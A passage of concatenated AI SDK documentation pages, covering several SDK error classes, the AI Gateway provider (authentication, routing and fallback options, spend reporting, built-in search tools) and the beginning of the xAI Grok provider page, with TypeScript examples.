import { TooManyEmbeddingValuesForCallError } from 'ai';

if (TooManyEmbeddingValuesForCallError.isInstance(error)) {
  // Handle the error
}

title: AI_ToolCallNotFoundForApprovalError description: Learn how to fix AI_ToolCallNotFoundForApprovalError

AI_ToolCallNotFoundForApprovalError

This error occurs when a tool approval request references a tool call that was not found. This can happen when processing provider-emitted approval requests (e.g., MCP flows) where the referenced tool call ID does not exist.

Properties

toolCallId: The tool call ID that was not found
approvalId: The approval request ID

Checking for this Error

You can check if an error is an instance of AI_ToolCallNotFoundForApprovalError using:

import { ToolCallNotFoundForApprovalError } from 'ai';

if (ToolCallNotFoundForApprovalError.isInstance(error)) {
  // Handle the error
}

title: ToolCallRepairError description: Learn how to fix AI SDK ToolCallRepairError

ToolCallRepairError

This error occurs when there is a failure while attempting to repair an invalid tool call. This typically happens when the AI attempts to fix either a NoSuchToolError or InvalidToolInputError.

Properties

originalError: The original error that triggered the repair attempt (either NoSuchToolError or InvalidToolInputError)
message: The error message
cause: The underlying error that caused the repair to fail

Checking for this Error

You can check if an error is an instance of ToolCallRepairError using:

import { ToolCallRepairError } from 'ai';

if (ToolCallRepairError.isInstance(error)) {
  // Handle the error
}

title: AI_TypeValidationError description: Learn how to fix AI_TypeValidationError

AI_TypeValidationError

This error occurs when type validation fails.

Properties

value: The value that failed validation
cause: The underlying validation error (required in constructor)

Checking for this Error

You can check if an error is an instance of AI_TypeValidationError using:

import { TypeValidationError } from 'ai';

if (TypeValidationError.isInstance(error)) {
  // Handle the error
}

title: AI_UIMessageStreamError description: Learn how to fix AI_UIMessageStreamError

AI_UIMessageStreamError

This error occurs when a UI message stream contains invalid or out-of-sequence chunks.

Common causes:

Receiving a text-delta chunk without a preceding text-start chunk
Receiving a text-end chunk without a preceding text-start chunk
Receiving a reasoning-delta chunk without a preceding reasoning-start chunk
Receiving a reasoning-end chunk without a preceding reasoning-start chunk
Receiving a tool-input-delta chunk without a preceding tool-input-start chunk
Attempting to access a tool invocation that doesn't exist

This error often surfaces when an upstream request fails before any tokens are streamed and a custom transport tries to write an inline error message to the UI stream without the proper start chunk.

Properties

chunkType: The type of chunk that caused the error (e.g., text-delta, reasoning-end, tool-input-delta)
chunkId: The ID associated with the failing chunk (part ID or toolCallId)
message: The error message with details about what went wrong

Checking for this Error

You can check if an error is an instance of AI_UIMessageStreamError using:

import { UIMessageStreamError } from 'ai';

if (UIMessageStreamError.isInstance(error)) {
  console.log('Chunk type:', error.chunkType);
  console.log('Chunk ID:', error.chunkId);
  // Handle the error
}

Common Solutions

Ensure proper chunk ordering: Always send a *-start chunk before any *-delta or *-end chunks for the same ID:

// Correct order
writer.write({ type: 'text-start', id: 'my-text' });
writer.write({ type: 'text-delta', id: 'my-text', delta: 'Hello' });
writer.write({ type: 'text-end', id: 'my-text' });

Verify IDs match: Ensure the id used in *-delta and *-end chunks matches the id used in the corresponding *-start chunk.

Handle error paths correctly: When writing error messages in custom transports, ensure you emit the full start/delta/end sequence:

// When handling errors in custom transports
writer.write({ type: 'text-start', id: errorId });
writer.write({
  type: 'text-delta',
  id: errorId,
  delta: 'Request failed...',
});
writer.write({ type: 'text-end', id: errorId });

Check stream producer logic: Review your streaming implementation to ensure chunks are sent in the correct order, especially when dealing with concurrent operations or merged streams.

title: AI_UnsupportedFunctionalityError description: Learn how to fix AI_UnsupportedFunctionalityError

AI_UnsupportedFunctionalityError

This error occurs when functionality is not supported.

Properties

functionality: The name of the unsupported functionality
message: The error message (optional, auto-generated from functionality)

Checking for this Error

You can check if an error is an instance of AI_UnsupportedFunctionalityError using:

import { UnsupportedFunctionalityError } from 'ai';

if (UnsupportedFunctionalityError.isInstance(error)) {
  // Handle the error
}

title: AI Gateway description: Learn how to use the AI Gateway provider with the AI SDK.

AI Gateway Provider

Features

Access models from multiple providers without having to install additional provider modules/dependencies
Use the same code structure across different AI providers
Switch between models and providers easily
Automatic authentication when deployed on Vercel
View pricing information across providers
Observability for AI model usage through the Vercel dashboard

Setup

The Vercel AI Gateway provider is part of the AI SDK.

Basic Usage

For most use cases, you can use the AI Gateway directly with a model string:

// use plain model string with global provider
import { generateText } from "ai";

const { text } = await generateText({
  model: "openai/gpt-5.4",
  prompt: "Hello world",
});

// use provider instance (requires version 5.0.36 or later)
import { generateText, gateway } from "ai";

const { text } = await generateText({
  model: gateway("openai/gpt-5.4"),
  prompt: "Hello world",
});

The AI SDK automatically uses the AI Gateway when you pass a model string in the creator/model-name format.

Provider Instance

You can also import the default provider instance gateway from ai:

import { gateway } from "ai";

You may want to create a custom provider instance when you need to:

Set custom configuration options (API key, base URL, headers)
Use the provider in a provider registry
Wrap the provider with middleware
Use different settings for different parts of your application

To create a custom provider instance, import createGateway from ai:

import { createGateway } from "ai";

const gateway = createGateway({
  apiKey: process.env.AI_GATEWAY_API_KEY ?? "",
});

You can use the following optional settings to customize the AI Gateway provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://ai-gateway.vercel.sh/v3/ai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the AI_GATEWAY_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
metadataCacheRefreshMillis number

How frequently to refresh the metadata cache in milliseconds. Defaults to 5 minutes (300,000ms).

Authentication

The Gateway provider supports two authentication methods:

API Key Authentication

Set your API key via environment variable:

AI_GATEWAY_API_KEY=your_api_key_here

Or pass it directly to the provider:

import { createGateway } from "ai";

const gateway = createGateway({
  apiKey: "your_api_key_here",
});

OIDC Authentication (Vercel Deployments)

When deployed to Vercel, the AI Gateway provider supports authenticating using OIDC (OpenID Connect) tokens without API Keys.

How OIDC Authentication Works

In Production/Preview Deployments:
- OIDC authentication is automatically handled
- No manual configuration needed
- Tokens are automatically obtained and refreshed
In Local Development:
- First, install and authenticate with the Vercel CLI
- Run vercel env pull to download your project's OIDC token locally
- For automatic token management:
  - Use vercel dev to start your development server - this will handle token refreshing automatically
- For manual token management:
  - If not using vercel dev, note that OIDC tokens expire after 12 hours
  - You'll need to run vercel env pull again to refresh the token before it expires

Read more about using OIDC tokens in the Vercel AI Gateway docs.

Bring Your Own Key (BYOK)

You can connect your own provider credentials to use with Vercel AI Gateway. This lets you use your existing provider accounts and access private resources.

To set up BYOK, add your provider credentials in your Vercel team's AI Gateway settings. Once configured, AI Gateway automatically uses your credentials. No code changes are needed.

Learn more in the BYOK documentation.

Language Models

You can create language models using a provider instance. The first argument is the model ID in the format creator/model-name:

import { generateText } from "ai";

const { text } = await generateText({
  model: "openai/gpt-5.4",
  prompt: "Explain quantum computing in simple terms",
});

AI Gateway language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Reranking Models

You can create reranking models using the rerankingModel method on the provider instance:

import { rerank } from "ai";
import { gateway } from "@ai-sdk/gateway";

const { ranking } = await rerank({
  model: gateway.rerankingModel("cohere/rerank-v3.5"),
  query: "What is the capital of France?",
  documents: [
    "Paris is the capital of France.",
    "Berlin is the capital of Germany.",
    "Madrid is the capital of Spain.",
  ],
  topN: 2,
});

console.log(ranking);
// [
//   { originalIndex: 0, score: 0.89, document: 'Paris is the capital of France.' },
//   { originalIndex: 2, score: 0.15, document: 'Madrid is the capital of Spain.' },
// ]

Reranking models are useful for improving search results in retrieval-augmented generation (RAG) pipelines by re-scoring candidate documents after an initial retrieval step.

Available Models

The AI Gateway supports models from OpenAI, Anthropic, Google, Meta, xAI, Mistral, DeepSeek, Amazon Bedrock, Cohere, Perplexity, Alibaba, and other providers.

For the complete list of available models, see the AI Gateway documentation.

Dynamic Model Discovery

You can discover available models programmatically:

import { gateway, generateText } from "ai";

const availableModels = await gateway.getAvailableModels();

// List all available models
availableModels.models.forEach((model) => {
  console.log(`${model.id}: ${model.name}`);
  if (model.description) {
    console.log(`  Description: ${model.description}`);
  }
  if (model.pricing) {
    console.log(`  Input: $${model.pricing.input}/token`);
    console.log(`  Output: $${model.pricing.output}/token`);
    if (model.pricing.cachedInputTokens) {
      console.log(
        `  Cached input (read): $${model.pricing.cachedInputTokens}/token`,
      );
    }
    if (model.pricing.cacheCreationInputTokens) {
      console.log(
        `  Cache creation (write): $${model.pricing.cacheCreationInputTokens}/token`,
      );
    }
  }
});

// Use any discovered model with plain string
const { text } = await generateText({
  model: availableModels.models[0].id, // e.g., 'openai/gpt-5.4'
  prompt: "Hello world",
});

Credit Usage

You can check your team's current credit balance and usage:

import { gateway } from "ai";

const credits = await gateway.getCredits();

console.log(`Team balance: ${credits.balance} credits`);
console.log(`Team total used: ${credits.total_used} credits`);

The getCredits() method returns your team's credit information based on the authenticated API key or OIDC token:

balance number - Your team's current available credit balance
total_used number - Total credits consumed by your team

Generation Lookup

import { gateway, generateText } from "ai";

// Make a request
const result = await generateText({
  model: gateway("anthropic/claude-sonnet-4"),
  prompt: "Explain quantum entanglement briefly",
});

// Get the generation ID from provider metadata
const generationId = result.providerMetadata?.gateway?.generationId;

// Look up detailed generation info
const generation = await gateway.getGenerationInfo({ id: generationId });

console.log(`Model: ${generation.model}`);
console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
console.log(`Latency: ${generation.latency}ms`);
console.log(`Prompt tokens: ${generation.promptTokens}`);
console.log(`Completion tokens: ${generation.completionTokens}`);

With streamText, you can capture the generation ID from the first chunk via fullStream:

import { gateway, streamText } from "ai";

const result = streamText({
  model: gateway("anthropic/claude-sonnet-4"),
  prompt: "Explain quantum entanglement briefly",
});

let generationId: string | undefined;

for await (const part of result.fullStream) {
  if (!generationId && part.providerMetadata?.gateway?.generationId) {
    generationId = part.providerMetadata.gateway.generationId as string;
    console.log(`Generation ID (early): ${generationId}`);
  }
}

// Look up cost and usage after the stream completes
if (generationId) {
  const generation = await gateway.getGenerationInfo({ id: generationId });
  console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
  console.log(`Finish reason: ${generation.finishReason}`);
}

The getGenerationInfo() method accepts:

id string - The generation ID to look up (format: gen_<ulid>, required)

It returns a GatewayGenerationInfo object with the following fields:

id string - The generation ID
totalCost number - Total cost in USD
upstreamInferenceCost number - Upstream inference cost in USD (relevant for BYOK)
usage number - Usage cost in USD (same as totalCost)
createdAt string - ISO 8601 timestamp when the generation was created
model string - Model identifier used
isByok boolean - Whether Bring Your Own Key credentials were used
providerName string - The provider that served this generation
streamed boolean - Whether streaming was used
finishReason string - Finish reason (e.g. 'stop')
latency number - Time to first token in milliseconds
generationTime number - Total generation time in milliseconds
promptTokens number - Number of prompt tokens
completionTokens number - Number of completion tokens
reasoningTokens number - Reasoning tokens used (if applicable)
cachedTokens number - Cached tokens used (if applicable)
cacheCreationTokens number - Cache creation input tokens
billableWebSearchCalls number - Number of billable web search calls

Examples

Basic Text Generation

import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Write a haiku about programming",
});

console.log(text);

Streaming

import { streamText } from "ai";

const { textStream } = await streamText({
  model: "openai/gpt-5.4",
  prompt: "Explain the benefits of serverless architecture",
});

for await (const textPart of textStream) {
  process.stdout.write(textPart);
}

Tool Usage

import { generateText, tool } from "ai";
import { z } from "zod";

const { text } = await generateText({
  model: "xai/grok-4",
  prompt: "What is the weather like in San Francisco?",
  tools: {
    getWeather: tool({
      description: "Get the current weather for a location",
      parameters: z.object({
        location: z.string().describe("The location to get weather for"),
      }),
      execute: async ({ location }) => {
        // Your weather API call here
        return `It's sunny in ${location}`;
      },
    }),
  },
});

Provider-Executed Tools

Some providers offer tools that are executed by the provider itself, such as OpenAI's web search tool. To use these tools through AI Gateway, import the provider to access the tool definitions:

import { generateText, stepCountIs } from "ai";
import { openai } from "@ai-sdk/openai";

const result = await generateText({
  model: "openai/gpt-5.4-mini",
  prompt: "What is the Vercel AI Gateway?",
  stopWhen: stepCountIs(10),
  tools: {
    web_search: openai.tools.webSearch({}),
  },
});

console.dir(result.text);

Gateway Tools

The AI Gateway provider includes built-in tools that are executed by the gateway itself. These tools can be used with any model through the gateway.

Perplexity Search

import { gateway, generateText } from "ai";

const result = await generateText({
  model: "openai/gpt-5.4-nano",
  prompt: "Search for news about AI regulations in January 2025.",
  tools: {
    perplexity_search: gateway.tools.perplexitySearch(),
  },
});

console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));

You can also configure the search with optional parameters:

import { gateway, generateText } from "ai";

const result = await generateText({
  model: "openai/gpt-5.4-nano",
  prompt:
    "Search for news about AI regulations from the first week of January 2025.",
  tools: {
    perplexity_search: gateway.tools.perplexitySearch({
      maxResults: 5,
      searchLanguageFilter: ["en"],
      country: "US",
      searchDomainFilter: ["reuters.com", "bbc.com", "nytimes.com"],
    }),
  },
});

console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));

The Perplexity Search tool supports the following optional configuration options:

maxResults number

The maximum number of search results to return (1-20, default: 10).
maxTokensPerPage number

The maximum number of tokens to extract per search result page (256-2048, default: 2048).
maxTokens number

The maximum total tokens across all search results (default: 25000, max: 1000000).
searchLanguageFilter string[]

Filter search results by language using ISO 639-1 language codes (e.g., ['en'] for English, ['en', 'es'] for English and Spanish).
country string

Filter search results by country using ISO 3166-1 alpha-2 country codes (e.g., 'US' for United States, 'GB' for United Kingdom).
searchDomainFilter string[]

Limit search results to specific domains (e.g., ['reuters.com', 'bbc.com']). This is useful for restricting results to trusted sources.
searchRecencyFilter 'day' | 'week' | 'month' | 'year'

Filter search results by relative time period. Useful for always getting recent results (e.g., 'week' for results from the last week).

The tool works with both generateText and streamText:

import { gateway, streamText } from "ai";

const result = streamText({
  model: "openai/gpt-5.4-nano",
  prompt: "Search for the latest news about AI regulations.",
  tools: {
    perplexity_search: gateway.tools.perplexitySearch(),
  },
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case "text-delta":
      process.stdout.write(part.text);
      break;
    case "tool-call":
      console.log("\nTool call:", JSON.stringify(part, null, 2));
      break;
    case "tool-result":
      console.log("\nTool result:", JSON.stringify(part, null, 2));
      break;
  }
}

Parallel Search

import { gateway, generateText } from "ai";

const result = await generateText({
  model: "openai/gpt-5.4-nano",
  prompt: "Research the latest developments in quantum computing.",
  tools: {
    parallel_search: gateway.tools.parallelSearch(),
  },
});

console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));

You can also configure the search with optional parameters:

import { gateway, generateText } from "ai";

const result = await generateText({
  model: "openai/gpt-5.4-nano",
  prompt: "Find detailed information about TypeScript 5.0 features.",
  tools: {
    parallel_search: gateway.tools.parallelSearch({
      mode: "agentic",
      maxResults: 5,
      sourcePolicy: {
        includeDomains: ["typescriptlang.org", "github.com"],
      },
      excerpts: {
        maxCharsPerResult: 8000,
      },
    }),
  },
});

console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));

The Parallel Search tool supports the following optional configuration options:

mode 'one-shot' | 'agentic'

Mode preset for different use cases:
- 'one-shot' - Comprehensive results with longer excerpts for single-response answers (default)
- 'agentic' - Concise, token-efficient results optimized for multi-step agentic workflows
maxResults number

Maximum number of results to return (1-20). Defaults to 10 if not specified.
sourcePolicy object

Source policy for controlling which domains to include/exclude:
- includeDomains - List of domains to include in search results
- excludeDomains - List of domains to exclude from search results
- afterDate - Only include results published after this date (ISO 8601 format)
excerpts object

Excerpt configuration for controlling result length:
- maxCharsPerResult - Maximum characters per result
- maxCharsTotal - Maximum total characters across all results
fetchPolicy object

Fetch policy for controlling content freshness:
- maxAgeSeconds - Maximum age in seconds for cached content (set to 0 for always fresh)

The tool works with both generateText and streamText:

import { gateway, streamText } from "ai";

const result = streamText({
  model: "openai/gpt-5.4-nano",
  prompt: "Research the latest AI safety guidelines.",
  tools: {
    parallel_search: gateway.tools.parallelSearch(),
  },
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case "text-delta":
      process.stdout.write(part.text);
      break;
    case "tool-call":
      console.log("\nTool call:", JSON.stringify(part, null, 2));
      break;
    case "tool-result":
      console.log("\nTool result:", JSON.stringify(part, null, 2));
      break;
  }
}

Usage Tracking with User and Tags

Track usage per end-user and categorize requests with tags:

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "openai/gpt-5.4",
  prompt: "Summarize this document...",
  providerOptions: {
    gateway: {
      user: "user-abc-123", // Track usage for this specific end-user
      tags: ["document-summary", "premium-feature"], // Categorize for reporting
    } satisfies GatewayProviderOptions,
  },
});

This allows you to:

View usage and costs broken down by end-user in your analytics
Filter and analyze spending by feature or use case using tags
Track which users or features are driving the most AI usage

Querying Spend Reports

Use the getSpendReport() method to query usage data programmatically. The reporting API is only available for Vercel Pro and Enterprise plans. For pricing, see the Custom Reporting docs.

import { gateway } from "ai";

const report = await gateway.getSpendReport({
  startDate: "2026-03-01",
  endDate: "2026-03-25",
  groupBy: "model",
});

for (const row of report.results) {
  console.log(`${row.model}: $${row.totalCost.toFixed(4)}`);
}

The getSpendReport() method accepts the following parameters:

startDate string - Start date in YYYY-MM-DD format (inclusive, required)
endDate string - End date in YYYY-MM-DD format (inclusive, required)
groupBy string - Aggregation dimension: 'day' (default), 'user', 'model', 'tag', 'provider', or 'credential_type'
datePart string - Time granularity when groupBy is 'day': 'day' or 'hour'
userId string - Filter to a specific user
model string - Filter to a specific model (e.g. 'anthropic/claude-sonnet-4.5')
provider string - Filter to a specific provider (e.g. 'anthropic')
credentialType string - Filter by 'byok' or 'system' credentials
tags string[] - Filter to requests matching these tags

Each row in results contains a grouping field (matching your groupBy choice) and metrics:

totalCost number - Total cost in USD
marketCost number - Market cost in USD
inputTokens number - Number of input tokens
outputTokens number - Number of output tokens
cachedInputTokens number - Number of cached input tokens
cacheCreationInputTokens number - Number of cache creation input tokens
reasoningTokens number - Number of reasoning tokens
requestCount number - Number of requests

You can combine tracking and querying to analyze spend by tags you defined:

import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { gateway, streamText } from 'ai';

// 1. Make requests with tags
const result = streamText({
  model: gateway('anthropic/claude-haiku-4.5'),
  prompt: 'Summarize this quarter's results',
  providerOptions: {
    gateway: {
      tags: ['team:finance', 'feature:summaries'],
    } satisfies GatewayProviderOptions,
  },
});

// 2. Later, query spend filtered by those tags
const report = await gateway.getSpendReport({
  startDate: '2026-03-01',
  endDate: '2026-03-31',
  groupBy: 'tag',
  tags: ['team:finance'],
});

for (const row of report.results) {
  console.log(`${row.tag}: $${row.totalCost.toFixed(4)} (${row.requestCount} requests)`);
}

Provider Options

The AI Gateway provider accepts provider options that control routing behavior and provider-specific configurations.

Gateway Provider Options

You can use the gateway key in providerOptions to control how AI Gateway routes requests:

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Explain quantum computing",
  providerOptions: {
    gateway: {
      order: ["vertex", "anthropic"], // Try Vertex AI first, then Anthropic
      only: ["vertex", "anthropic"], // Only use these providers
    } satisfies GatewayProviderOptions,
  },
});

The following gateway provider options are available:

order string[]

Specifies the sequence of providers to attempt when routing requests. The gateway will try providers in the order specified. If a provider fails or is unavailable, it will move to the next provider in the list.

Example: order: ['bedrock', 'anthropic'] will attempt Amazon Bedrock first, then fall back to Anthropic.
only string[]

Restricts routing to only the specified providers. When set, the gateway will never route to providers not in this list, even if they would otherwise be available.

Example: only: ['anthropic', 'vertex'] will only allow routing to Anthropic or Vertex AI.
sort 'cost' | 'ttft' | 'tps'

Sorts available providers by a performance or cost metric before routing. The gateway will try the best-scoring provider first and fall back through the rest in sorted order. If unspecified, providers are ordered using the gateway's default system ranking.
- 'cost' — lowest cost first
- 'ttft' — lowest time-to-first-token first
- 'tps' — highest tokens-per-second first
When combined with order, the user-specified providers are promoted to the front while remaining providers follow the sorted order.

Example: sort: 'ttft' will route to the provider with the fastest time-to-first-token.

When sort is active, the response's providerMetadata.gateway.routing.sort object contains the sort option used, the resulting execution order, per-provider metric values, and any providers that were deprioritized.
models string[]

Specifies fallback models to use when the primary model fails or is unavailable. The gateway will try the primary model first (specified in the model parameter), then try each model in this array in order until one succeeds.

Example: models: ['openai/gpt-5.4-nano', 'gemini-3-flash-preview'] will try the fallback models in order if the primary model fails.
user string

Optional identifier for the end user on whose behalf the request is being made. This is used for spend tracking and attribution purposes, allowing you to track usage per end-user in your application.

Example: user: 'user-123' will associate this request with end-user ID "user-123" in usage reports.
tags string[]

Optional array of tags for categorizing and filtering usage in reports. Useful for tracking spend by feature, prompt version, or any other dimension relevant to your application.

Example: tags: ['chat', 'v2'] will tag this request with "chat" and "v2" for filtering in usage analytics.
byok Record<string, Array<Record<string, unknown>>>

Request-scoped BYOK (Bring Your Own Key) credentials to use for this request. When provided, any cached BYOK credentials configured in the gateway system are not considered. Requests may still fall back to use system credentials if the provided credentials fail.

Each provider can have multiple credentials (tried in order). The structure is a record where keys are provider slugs and values are arrays of credential objects.

Examples:
- Single provider: byok: { 'anthropic': [{ apiKey: 'sk-ant-...' }] }
- Multiple credentials: byok: { 'vertex': [{ project: 'proj-1', googleCredentials: { privateKey: '...', clientEmail: '...' } }, { project: 'proj-2', googleCredentials: { privateKey: '...', clientEmail: '...' } }] }
- Multiple providers: byok: { 'anthropic': [{ apiKey: '...' }], 'bedrock': [{ accessKeyId: '...', secretAccessKey: '...' }] }
zeroDataRetention boolean

Restricts routing requests to providers that have zero data retention agreements with Vercel for AI Gateway. If there are no providers available for the model with zero data retention, the request will fail. BYOK credentials are skipped when zeroDataRetention is set to true to ensure that requests are only routed to providers that support ZDR compliance. Request-level ZDR is only available for Vercel Pro and Enterprise plans.
disallowPromptTraining boolean

Restricts routing requests to providers that have agreements with Vercel for AI Gateway to not use prompts for model training. If there are no providers available for the model that disallow prompt training, the request will fail. BYOK credentials are skipped when disallowPromptTraining is set to true to ensure that requests are only routed to providers that do not train on prompt data.
hipaaCompliant boolean

Restricts routing to models and tools from providers that have signed a BAA with Vercel for the use of AI Gateway (requires Vercel HIPAA BAA add on). BYOK credentials are skipped when hipaaCompliant is set to true to ensure that requests are only routed to providers that support HIPAA compliance.
quotaEntityId string

The unique identifier for the entity against which quota is tracked. Used for quota management and enforcement purposes.
providerTimeouts object

Per-provider timeouts for BYOK credentials in milliseconds. Controls how long to wait for a provider to start responding before falling back to the next available provider.

Example: providerTimeouts: { byok: { openai: 5000, anthropic: 2000 } }

For full details, see Provider Timeouts.

You can combine these options to have fine-grained control over routing and tracking:

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Write a haiku about programming",
  providerOptions: {
    gateway: {
      order: ["vertex"], // Prefer Vertex AI
      only: ["anthropic", "vertex"], // Only allow these providers
    } satisfies GatewayProviderOptions,
  },
});

Model Fallbacks Example

The models option enables automatic fallback to alternative models when the primary model fails:

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "openai/gpt-5.4", // Primary model
  prompt: "Write a TypeScript haiku",
  providerOptions: {
    gateway: {
      models: ["openai/gpt-5.4-nano", "gemini-3-flash-preview"], // Fallback models
    } satisfies GatewayProviderOptions,
  },
});

// This will:
// 1. Try openai/gpt-5.4 first
// 2. If it fails, try openai/gpt-5.4-nano
// 3. If that fails, try gemini-3-flash-preview
// 4. Return the result from the first model that succeeds

Zero Data Retention Example

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Analyze this sensitive document...",
  providerOptions: {
    gateway: {
      zeroDataRetention: true,
    } satisfies GatewayProviderOptions,
  },
});

Disallow Prompt Training Example

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Analyze this proprietary business data...",
  providerOptions: {
    gateway: {
      disallowPromptTraining: true,
    } satisfies GatewayProviderOptions,
  },
});

HIPAA Compliance Example

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Analyze this patient data...",
  providerOptions: {
    gateway: {
      hipaaCompliant: true,
    } satisfies GatewayProviderOptions,
  },
});

Quota Entity ID Example

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Summarize this report...",
  providerOptions: {
    gateway: {
      quotaEntityId: "org-123",
    } satisfies GatewayProviderOptions,
  },
});

Provider-Specific Options

When using provider-specific options through AI Gateway, use the actual provider name (e.g. anthropic, openai, not gateway) as the key:

import type { AnthropicLanguageModelOptions } from "@ai-sdk/anthropic";
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Explain quantum computing",
  providerOptions: {
    gateway: {
      order: ["vertex", "anthropic"],
    } satisfies GatewayProviderOptions,
    anthropic: {
      thinking: { type: "enabled", budgetTokens: 12000 },
    } satisfies AnthropicLanguageModelOptions,
  },
});

This works with any provider supported by AI Gateway. Each provider has its own set of options - see the individual provider documentation pages for details on provider-specific options.

Available Providers

AI Gateway supports routing to 20+ providers.

For a complete list of available providers and their slugs, see the AI Gateway documentation.

Model Capabilities

Model capabilities depend on the specific provider and model you're using. For detailed capability information, see:

AI Gateway provider options for an overview of available providers
Individual AI SDK provider pages for specific model capabilities and features

title: xAI Grok description: Learn how to use xAI Grok and Imagine.

xAI Grok Provider

The xAI Grok provider contains language model support for the xAI API.

Setup

The xAI Grok provider is available via the @ai-sdk/xai module. You can install it with

Provider Instance

You can import the default provider instance xai from @ai-sdk/xai:

import { xai } from '@ai-sdk/xai';

If you need a customized setup, you can import createXai from @ai-sdk/xai and create a provider instance with your settings:

import { createXai } from '@ai-sdk/xai';

const xai = createXai({
  apiKey: 'your-api-key',
});

You can use the following optional settings to customize the xAI provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.x.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the XAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create xAI models using a provider instance. The first argument is the model id, e.g. grok-4.20-non-reasoning.

const model = xai('grok-4.20-non-reasoning');

By default, xai(modelId) uses the Chat API. To use the Responses API with server-side agentic tools, explicitly use xai.responses(modelId).

Example

You can use xAI language models to generate text with the generateText function:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: xai('grok-4.20-non-reasoning'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

xAI language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Provider Options

xAI chat models support additional provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:

import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';

const model = xai('grok-3-mini');

await generateText({
  model,
  providerOptions: {
    xai: {
      reasoningEffort: 'high',
    } satisfies XaiLanguageModelChatOptions,
  },
});

The following optional provider options are available for xAI chat models:

reasoningEffort 'low' | 'high'

Reasoning effort for reasoning models.
logprobs boolean

Return log probabilities for output tokens.
topLogprobs number

Number of most likely tokens to return per token position (0-8). When set, logprobs is automatically enabled.
parallel_function_calling boolean

Whether to enable parallel function calling during tool use. When true, the model can call multiple functions in parallel. When false, the model will call functions sequentially. Defaults to true.

Responses API (Agentic Tools)

const model = xai.responses('grok-4.20-non-reasoning');

The Responses API provides server-side tools that the model can autonomously execute during its reasoning process:

web_search: Real-time web search and page browsing
x_search: Search X (Twitter) posts, users, and threads
code_execution: Execute Python code for calculations and data analysis
view_image: View and analyze images
view_x_video: View and analyze videos from X posts
mcp_server: Connect to remote MCP servers and use their tools
file_search: Search through documents in vector stores (collections)

Vision

The Responses API supports image input with vision models:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: xai.responses('grok-3'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'What do you see in this image?' },
        { type: 'image', image: fs.readFileSync('./image.png') },
      ],
    },
  ],
});

Web Search Tool

The web search tool enables autonomous web research with optional domain filtering and image understanding:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'What are the latest developments in AI?',
  tools: {
    web_search: xai.tools.webSearch({
      allowedDomains: ['arxiv.org', 'openai.com'],
      enableImageUnderstanding: true,
    }),
  },
});

console.log(text);
console.log('Citations:', sources);

Web Search Parameters

allowedDomains string[]

Only search within specified domains (max 5). Cannot be used with excludedDomains.
excludedDomains string[]

Exclude specified domains from search (max 5). Cannot be used with allowedDomains.
enableImageUnderstanding boolean

Enable the model to view and analyze images found during search. Increases token usage.

X Search Tool

The X search tool enables searching X (Twitter) for posts, with filtering by handles and date ranges:

const { text, sources } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'What are people saying about AI on X this week?',
  tools: {
    x_search: xai.tools.xSearch({
